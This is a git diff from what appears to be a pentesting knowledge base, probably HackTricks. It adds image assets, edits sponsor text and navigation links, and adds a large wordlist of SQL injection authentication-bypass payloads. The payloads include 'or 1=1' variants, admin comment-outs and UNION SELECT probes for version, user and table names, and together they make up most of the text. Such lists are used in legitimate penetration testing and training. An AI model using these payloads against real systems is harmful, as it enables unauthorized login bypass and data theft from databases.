Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (4).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (5).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (6).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (7).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (8).png differ
diff --git a/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png
new file mode 100644
index 000000000..8b7813787
Binary files /dev/null and b/.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (9).png differ
diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png
new file mode 100644
index 000000000..4e69d4e12
Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png differ
diff --git a/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png
new file mode 100644
index 000000000..4e69d4e12
Binary files /dev/null and b/.gitbook/assets/image (638) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (2).png differ
diff --git a/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
new file mode 100644
index 000000000..5a03da57f
--- /dev/null
+++ b/.gitbook/assets/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
@@ -0,0 +1,771 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+==
+=
+'
+' --
+' #
+' –
+'--
+'/*
+'#
+" --
+" #
+"/*
+' and 1='1
+' and a='a
+ or 1=1
+ or true
+' or ''='
+" or ""="
+1′) and '1′='1–
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+ and 1=1
+ and 1=1–
+' and 'one'='one
+' and 'one'='one–
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+ like '%'
+ or 0=0 --
+ or 0=0 #
+ or 0=0 –
+' or 0=0 #
+' or 0=0 --
+' or 0=0 #
+' or 0=0 –
+" or 0=0 --
+" or 0=0 #
+" or 0=0 –
+%' or '0'='0
+ or 1=1
+ or 1=1--
+ or 1=1/*
+ or 1=1#
+ or 1=1–
+' or 1=1--
+' or '1'='1
+' or '1'='1'--
+' or '1'='1'/*
+' or '1'='1'#
+' or '1′='1
+' or 1=1
+' or 1=1 --
+' or 1=1 –
+' or 1=1--
+' or 1=1;#
+' or 1=1/*
+' or 1=1#
+' or 1=1–
+') or '1'='1
+') or '1'='1--
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1'#
+') or ('1'='1
+') or ('1'='1--
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1'#
+'or'1=1
+'or'1=1′
+" or "1"="1
+" or "1"="1"--
+" or "1"="1"/*
+" or "1"="1"#
+" or 1=1
+" or 1=1 --
+" or 1=1 β
+" or 1=1--
+" or 1=1/*
+" or 1=1#
+" or 1=1β
+") or "1"="1
+") or "1"="1"--
+") or "1"="1"/*
+") or "1"="1"#
+") or ("1"="1
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("1"="1"#
+) or '1′='1–
+) or ('1′='1–
+' or 1=1 LIMIT 1;#
+'or 1=1 or ''='
+"or 1=1 or ""="
+' or 'a'='a
+' or a=a--
+' or a=a–
+') or ('a'='a
+" or "a"="a
+") or ("a"="a
+') or ('a'='a and hi") or ("a"="a
+' or 'one'='one
+' or 'one'='one–
+' or uid like '%
+' or uname like '%
+' or userid like '%
+' or user like '%
+' or username like '%
+' or 'x'='x
+') or ('x'='x
+" or "x"="x
+' OR 'x'='x'#;
+'=' 'or' and '=' 'or'
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
+admin' and substring(password/text(),1,1)='7
+' and substring(password/text(),1,1)='7
+
+==
+=
+'
+"
+'-- 2
+'/*
+'#
+"-- 2
+" #
+"/*
+'-'
+'&'
+'^'
+'*'
+'='
+0'<'2
+"-"
+"&"
+"^"
+"*"
+"="
+0"<"2
+
+')
+")
+')-- 2
+')/*
+')#
+")-- 2
+") #
+")/*
+')-('
+')&('
+')^('
+')*('
+')=('
+0')<('2
+")-("
+")&("
+")^("
+")*("
+")=("
+0")<("2
+
+'-''-- 2
+'-''#
+'-''/*
+'&''-- 2
+'&''#
+'&''/*
+'^''-- 2
+'^''#
+'^''/*
+'*''-- 2
+'*''#
+'*''/*
+'=''-- 2
+'=''#
+'=''/*
+0'<'2'-- 2
+0'<'2'#
+0'<'2'/*
+"-""-- 2
+"-""#
+"-""/*
+"&""-- 2
+"&""#
+"&""/*
+"^""-- 2
+"^""#
+"^""/*
+"*""-- 2
+"*""#
+"*""/*
+"=""-- 2
+"=""#
+"=""/*
+0"<"2"-- 2
+0"<"2"#
+0"<"2"/*
+
+')-''-- 2
+')-''#
+')-''/*
+')&''-- 2
+')&''#
+')&''/*
+')^''-- 2
+')^''#
+')^''/*
+')*''-- 2
+')*''#
+')*''/*
+')=''-- 2
+')=''#
+')=''/*
+0')<'2'-- 2
+0')<'2'#
+0')<'2'/*
+")-""-- 2
+")-""#
+")-""/*
+")&""-- 2
+")&""#
+")&""/*
+")^""-- 2
+")^""#
+")^""/*
+")*""-- 2
+")*""#
+")*""/*
+")=""-- 2
+")=""#
+")=""/*
+0")<"2-- 2
+0")<"2#
+0")<"2/*
+
+
+'oR'2
+'oR'2'-- 2
+'oR'2'#
+'oR'2'/*
+'oR'2'oR'
+'oR(2)-- 2
+'oR(2)#
+'oR(2)/*
+'oR(2)oR'
+'oR 2-- 2
+'oR 2#
+'oR 2/*
+'oR 2 oR'
+'oR/**/2-- 2
+'oR/**/2#
+'oR/**/2/*
+'oR/**/2/**/oR'
+"oR"2
+"oR"2"-- 2
+"oR"2"#
+"oR"2"/*
+"oR"2"oR"
+"oR(2)-- 2
+"oR(2)#
+"oR(2)/*
+"oR(2)oR"
+"oR 2-- 2
+"oR 2#
+"oR 2/*
+"oR 2 oR"
+"oR/**/2-- 2
+"oR/**/2#
+"oR/**/2/*
+"oR/**/2/**/oR"
+
+'oR'2'='2
+'oR'2'='2'oR'
+'oR'2'='2'-- 2
+'oR'2'='2'#
+'oR'2'='2'/*
+'oR'2'='2'oR'
+'oR 2=2-- 2
+'oR 2=2#
+'oR 2=2/*
+'oR 2=2 oR'
+'oR/**/2=2-- 2
+'oR/**/2=2#
+'oR/**/2=2/*
+'oR/**/2=2/**/oR'
+'oR(2)=2-- 2
+'oR(2)=2#
+'oR(2)=2/*
+'oR(2)=2/*
+'oR(2)=(2)oR'
+'oR'2'='2' LimIT 1-- 2
+'oR'2'='2' LimIT 1#
+'oR'2'='2' LimIT 1/*
+'oR(2)=(2)LimIT(1)-- 2
+'oR(2)=(2)LimIT(1)#
+'oR(2)=(2)LimIT(1)/*
+"oR"2"="2
+"oR"2"="2"oR"
+"oR"2"="2"-- 2
+"oR"2"="2"#
+"oR"2"="2"/*
+"oR"2"="2"oR"
+"oR 2=2-- 2
+"oR 2=2#
+"oR 2=2/*
+"oR 2=2 oR"
+"oR/**/2=2-- 2
+"oR/**/2=2#
+"oR/**/2=2/*
+"oR/**/2=2/**/oR"
+"oR(2)=2-- 2
+"oR(2)=2#
+"oR(2)=2/*
+"oR(2)=2/*
+"oR(2)=(2)oR"
+"oR"2"="2" LimIT 1-- 2
+"oR"2"="2" LimIT 1#
+"oR"2"="2" LimIT 1/*
+"oR(2)=(2)LimIT(1)-- 2
+"oR(2)=(2)LimIT(1)#
+"oR(2)=(2)LimIT(1)/*
+
+'oR true-- 2
+'oR true#
+'oR true/*
+'oR true oR'
+'oR(true)-- 2
+'oR(true)#
+'oR(true)/*
+'oR(true)oR'
+'oR/**/true-- 2
+'oR/**/true#
+'oR/**/true/*
+'oR/**/true/**/oR'
+"oR true-- 2
+"oR true#
+"oR true/*
+"oR true oR"
+"oR(true)-- 2
+"oR(true)#
+"oR(true)/*
+"oR(true)oR"
+"oR/**/true-- 2
+"oR/**/true#
+"oR/**/true/*
+"oR/**/true/**/oR"
+
+'oR'2'LiKE'2
+'oR'2'LiKE'2'-- 2
+'oR'2'LiKE'2'#
+'oR'2'LiKE'2'/*
+'oR'2'LiKE'2'oR'
+'oR(2)LiKE(2)-- 2
+'oR(2)LiKE(2)#
+'oR(2)LiKE(2)/*
+'oR(2)LiKE(2)oR'
+"oR"2"LiKE"2
+"oR"2"LiKE"2"-- 2
+"oR"2"LiKE"2"#
+"oR"2"LiKE"2"/*
+"oR"2"LiKE"2"oR"
+"oR(2)LiKE(2)-- 2
+"oR(2)LiKE(2)#
+"oR(2)LiKE(2)/*
+"oR(2)LiKE(2)oR"
+
+admin
+admin'-- 2
+admin'#
+admin'/*
+admin"-- 2
+admin"#
+ffifdyop
+
+' UniON SElecT 1,2-- 2
+' UniON SElecT 1,2,3-- 2
+' UniON SElecT 1,2,3,4-- 2
+' UniON SElecT 1,2,3,4,5-- 2
+' UniON SElecT 1,2#
+' UniON SElecT 1,2,3#
+' UniON SElecT 1,2,3,4#
+' UniON SElecT 1,2,3,4,5#
+'UniON(SElecT(1),2)-- 2
+'UniON(SElecT(1),2,3)-- 2
+'UniON(SElecT(1),2,3,4)-- 2
+'UniON(SElecT(1),2,3,4,5)-- 2
+'UniON(SElecT(1),2)#
+'UniON(SElecT(1),2,3)#
+'UniON(SElecT(1),2,3,4)#
+'UniON(SElecT(1),2,3,4,5)#
+" UniON SElecT 1,2-- 2
+" UniON SElecT 1,2,3-- 2
+" UniON SElecT 1,2,3,4-- 2
+" UniON SElecT 1,2,3,4,5-- 2
+" UniON SElecT 1,2#
+" UniON SElecT 1,2,3#
+" UniON SElecT 1,2,3,4#
+" UniON SElecT 1,2,3,4,5#
+"UniON(SElecT(1),2)-- 2
+"UniON(SElecT(1),2,3)-- 2
+"UniON(SElecT(1),2,3,4)-- 2
+"UniON(SElecT(1),2,3,4,5)-- 2
+"UniON(SElecT(1),2)#
+"UniON(SElecT(1),2,3)#
+"UniON(SElecT(1),2,3,4)#
+"UniON(SElecT(1),2,3,4,5)#
+
+'||'2
+'||2-- 2
+'||'2'||'
+'||2#
+'||2/*
+'||2||'
+"||"2
+"||2-- 2
+"||"2"||"
+"||2#
+"||2/*
+"||2||"
+'||'2'='2
+'||'2'='2'||'
+'||2=2-- 2
+'||2=2#
+'||2=2/*
+'||2=2||'
+"||"2"="2
+"||"2"="2"||"
+"||2=2-- 2
+"||2=2#
+"||2=2/*
+"||2=2||"
+'||2=(2)LimIT(1)-- 2
+'||2=(2)LimIT(1)#
+'||2=(2)LimIT(1)/*
+"||2=(2)LimIT(1)-- 2
+"||2=(2)LimIT(1)#
+"||2=(2)LimIT(1)/*
+'||true-- 2
+'||true#
+'||true/*
+'||true||'
+"||true-- 2
+"||true#
+"||true/*
+"||true||"
+'||'2'LiKE'2
+'||'2'LiKE'2'-- 2
+'||'2'LiKE'2'#
+'||'2'LiKE'2'/*
+'||'2'LiKE'2'||'
+'||(2)LiKE(2)-- 2
+'||(2)LiKE(2)#
+'||(2)LiKE(2)/*
+'||(2)LiKE(2)||'
+"||"2"LiKE"2
+"||"2"LiKE"2"-- 2
+"||"2"LiKE"2"#
+"||"2"LiKE"2"/*
+"||"2"LiKE"2"||"
+"||(2)LiKE(2)-- 2
+"||(2)LiKE(2)#
+"||(2)LiKE(2)/*
+"||(2)LiKE(2)||"
+
+')oR('2
+')oR'2'-- 2
+')oR'2'#
+')oR'2'/*
+')oR'2'oR('
+')oR(2)-- 2
+')oR(2)#
+')oR(2)/*
+')oR(2)oR('
+')oR 2-- 2
+')oR 2#
+')oR 2/*
+')oR 2 oR('
+')oR/**/2-- 2
+')oR/**/2#
+')oR/**/2/*
+')oR/**/2/**/oR('
+")oR("2
+")oR"2"-- 2
+")oR"2"#
+")oR"2"/*
+")oR"2"oR("
+")oR(2)-- 2
+")oR(2)#
+")oR(2)/*
+")oR(2)oR("
+")oR 2-- 2
+")oR 2#
+")oR 2/*
+")oR 2 oR("
+")oR/**/2-- 2
+")oR/**/2#
+")oR/**/2/*
+")oR/**/2/**/oR("
+')oR'2'=('2
+')oR'2'='2'oR('
+')oR'2'='2'-- 2
+')oR'2'='2'#
+')oR'2'='2'/*
+')oR'2'='2'oR('
+')oR 2=2-- 2
+')oR 2=2#
+')oR 2=2/*
+')oR 2=2 oR('
+')oR/**/2=2-- 2
+')oR/**/2=2#
+')oR/**/2=2/*
+')oR/**/2=2/**/oR('
+')oR(2)=2-- 2
+')oR(2)=2#
+')oR(2)=2/*
+')oR(2)=2/*
+')oR(2)=(2)oR('
+')oR'2'='2' LimIT 1-- 2
+')oR'2'='2' LimIT 1#
+')oR'2'='2' LimIT 1/*
+')oR(2)=(2)LimIT(1)-- 2
+')oR(2)=(2)LimIT(1)#
+')oR(2)=(2)LimIT(1)/*
+")oR"2"=("2
+")oR"2"="2"oR("
+")oR"2"="2"-- 2
+")oR"2"="2"#
+")oR"2"="2"/*
+")oR"2"="2"oR("
+")oR 2=2-- 2
+")oR 2=2#
+")oR 2=2/*
+")oR 2=2 oR("
+")oR/**/2=2-- 2
+")oR/**/2=2#
+")oR/**/2=2/*
+")oR/**/2=2/**/oR("
+")oR(2)=2-- 2
+")oR(2)=2#
+")oR(2)=2/*
+")oR(2)=2/*
+")oR(2)=(2)oR("
+")oR"2"="2" LimIT 1-- 2
+")oR"2"="2" LimIT 1#
+")oR"2"="2" LimIT 1/*
+")oR(2)=(2)LimIT(1)-- 2
+")oR(2)=(2)LimIT(1)#
+")oR(2)=(2)LimIT(1)/*
+')oR true-- 2
+')oR true#
+')oR true/*
+')oR true oR('
+')oR(true)-- 2
+')oR(true)#
+')oR(true)/*
+')oR(true)oR('
+')oR/**/true-- 2
+')oR/**/true#
+')oR/**/true/*
+')oR/**/true/**/oR('
+")oR true-- 2
+")oR true#
+")oR true/*
+")oR true oR("
+")oR(true)-- 2
+")oR(true)#
+")oR(true)/*
+")oR(true)oR("
+")oR/**/true-- 2
+")oR/**/true#
+")oR/**/true/*
+")oR/**/true/**/oR("
+')oR'2'LiKE('2
+')oR'2'LiKE'2'-- 2
+')oR'2'LiKE'2'#
+')oR'2'LiKE'2'/*
+')oR'2'LiKE'2'oR('
+')oR(2)LiKE(2)-- 2
+')oR(2)LiKE(2)#
+')oR(2)LiKE(2)/*
+')oR(2)LiKE(2)oR('
+")oR"2"LiKE("2
+")oR"2"LiKE"2"-- 2
+")oR"2"LiKE"2"#
+")oR"2"LiKE"2"/*
+")oR"2"LiKE"2"oR("
+")oR(2)LiKE(2)-- 2
+")oR(2)LiKE(2)#
+")oR(2)LiKE(2)/*
+")oR(2)LiKE(2)oR("
+admin')-- 2
+admin')#
+admin')/*
+admin")-- 2
+admin")#
+') UniON SElecT 1,2-- 2
+') UniON SElecT 1,2,3-- 2
+') UniON SElecT 1,2,3,4-- 2
+') UniON SElecT 1,2,3,4,5-- 2
+') UniON SElecT 1,2#
+') UniON SElecT 1,2,3#
+') UniON SElecT 1,2,3,4#
+') UniON SElecT 1,2,3,4,5#
+')UniON(SElecT(1),2)-- 2
+')UniON(SElecT(1),2,3)-- 2
+')UniON(SElecT(1),2,3,4)-- 2
+')UniON(SElecT(1),2,3,4,5)-- 2
+')UniON(SElecT(1),2)#
+')UniON(SElecT(1),2,3)#
+')UniON(SElecT(1),2,3,4)#
+')UniON(SElecT(1),2,3,4,5)#
+") UniON SElecT 1,2-- 2
+") UniON SElecT 1,2,3-- 2
+") UniON SElecT 1,2,3,4-- 2
+") UniON SElecT 1,2,3,4,5-- 2
+") UniON SElecT 1,2#
+") UniON SElecT 1,2,3#
+") UniON SElecT 1,2,3,4#
+") UniON SElecT 1,2,3,4,5#
+")UniON(SElecT(1),2)-- 2
+")UniON(SElecT(1),2,3)-- 2
+")UniON(SElecT(1),2,3,4)-- 2
+")UniON(SElecT(1),2,3,4,5)-- 2
+")UniON(SElecT(1),2)#
+")UniON(SElecT(1),2,3)#
+")UniON(SElecT(1),2,3,4)#
+")UniON(SElecT(1),2,3,4,5)#
+')||('2
+')||2-- 2
+')||'2'||('
+')||2#
+')||2/*
+')||2||('
+")||("2
+")||2-- 2
+")||"2"||("
+")||2#
+")||2/*
+")||2||("
+')||'2'=('2
+')||'2'='2'||('
+')||2=2-- 2
+')||2=2#
+')||2=2/*
+')||2=2||('
+")||"2"=("2
+")||"2"="2"||("
+")||2=2-- 2
+")||2=2#
+")||2=2/*
+")||2=2||("
+')||2=(2)LimIT(1)-- 2
+')||2=(2)LimIT(1)#
+')||2=(2)LimIT(1)/*
+")||2=(2)LimIT(1)-- 2
+")||2=(2)LimIT(1)#
+")||2=(2)LimIT(1)/*
+')||true-- 2
+')||true#
+')||true/*
+')||true||('
+")||true-- 2
+")||true#
+")||true/*
+")||true||("
+')||'2'LiKE('2
+')||'2'LiKE'2'-- 2
+')||'2'LiKE'2'#
+')||'2'LiKE'2'/*
+')||'2'LiKE'2'||('
+')||(2)LiKE(2)-- 2
+')||(2)LiKE(2)#
+')||(2)LiKE(2)/*
+')||(2)LiKE(2)||('
+")||"2"LiKE("2
+")||"2"LiKE"2"-- 2
+")||"2"LiKE"2"#
+")||"2"LiKE"2"/*
+")||"2"LiKE"2"||("
+")||(2)LiKE(2)-- 2
+")||(2)LiKE(2)#
+")||(2)LiKE(2)/*
+")||(2)LiKE(2)||("
+' UnION SELeCT 1,2`
+' UnION SELeCT 1,2,3`
+' UnION SELeCT 1,2,3,4`
+' UnION SELeCT 1,2,3,4,5`
+" UnION SELeCT 1,2`
+" UnION SELeCT 1,2,3`
+" UnION SELeCT 1,2,3,4`
+" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md
index 30e9c3cba..b0e4b2d7e 100644
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@@ -22,7 +22,7 @@ dht udp "DHT Nodes"
![](<.gitbook/assets/image (273).png>)
-![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
InfluxDB
diff --git a/README.md b/README.md
index 3f43b7b96..7d59ec5ea 100644
--- a/README.md
+++ b/README.md
@@ -34,7 +34,7 @@ Here you will find the **typical flow** that **you should follow when pentesting
### [STM Cyber](https://www.stmcyber.com)
-![](<.gitbook/assets/image (642) (1) (1) (1).png>)
+![](<.gitbook/assets/image (638) (2) (1).png>)
[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training.
@@ -72,7 +72,7 @@ Get Access Today:
-[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
+[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protect** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach.
WebSec is an **all-in-one security company**, which means they do it all: Pentesting, **Security** Audits, Awareness Training, Phishing Campaigns, Code Review, Exploit Development, Security Experts Outsourcing and much more.
@@ -84,7 +84,7 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
### [**INE**](https://ine.com)
-![](.gitbook/assets/ine\_logo-3-.jpg)
+![](<.gitbook/assets/INE\_Logo (3).jpg>)
[**INE**](https://ine.com) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides the official courses to prepare for the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com)**.**
diff --git a/SUMMARY.md b/SUMMARY.md
index 875c43230..0ed9800a6 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -548,54 +548,9 @@
## ☁️ Cloud Security
-* [GCP Security](cloud-security/gcp-security/README.md)
- * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
- * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
- * [GCP - Privesc to other Principals](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md)
- * [GCP - Privesc to Resources](cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md)
- * [GCP - Buckets: Public Assets Brute-Force & Discovery, & Buckets Privilege Escalation](cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md)
- * [GCP - Compute Enumeration](cloud-security/gcp-security/gcp-compute-enumeration.md)
- * [GCP - Network Enumeration](cloud-security/gcp-security/gcp-network-enumeration.md)
- * [GCP - KMS & Secrets Management Enumeration](cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md)
- * [GCP - Databases Enumeration](cloud-security/gcp-security/gcp-databases-enumeration.md)
- * [GCP - Serverless Code Exec Services Enumeration](cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md)
- * [GCP - Buckets Enumeration](cloud-security/gcp-security/gcp-buckets-enumeration.md)
- * [GCP - Local Privilege Escalation / SSH Pivoting](cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md)
- * [GCP - Persistance](cloud-security/gcp-security/gcp-persistance.md)
-* [Workspace Security](cloud-security/workspace-security.md)
-* [Github Security](cloud-security/github-security/README.md)
- * [Basic Github Information](cloud-security/github-security/basic-github-information.md)
-* [Gitea Security](cloud-security/gitea-security/README.md)
- * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md)
-* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md)
- * [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md)
- * [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
- * [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md)
- * [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
- * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md)
- * [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
- * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md)
- * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md)
- * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
- * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md)
- * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
- * [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md)
- * [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
- * [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
- * [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
- * [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md)
-* [Concourse](cloud-security/concourse/README.md)
- * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md)
- * [Concourse Lab Creation](cloud-security/concourse/concourse-lab-creation.md)
- * [Concourse Enumeration & Attacks](cloud-security/concourse/concourse-enumeration-and-attacks.md)
-* [CircleCI](cloud-security/circleci.md)
-* [Jenkins](cloud-security/jenkins.md)
-* [Apache Airflow](cloud-security/apache-airflow/README.md)
- * [Airflow Configuration](cloud-security/apache-airflow/airflow-configuration.md)
- * [Airflow RBAC](cloud-security/apache-airflow/airflow-rbac.md)
-* [Atlantis](cloud-security/atlantis.md)
-* [Cloud Security Review](cloud-security/cloud-security-review.md)
-* [AWS Security](cloud-security/aws-security.md)
+* [Pentesting Kubernetes](https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security)
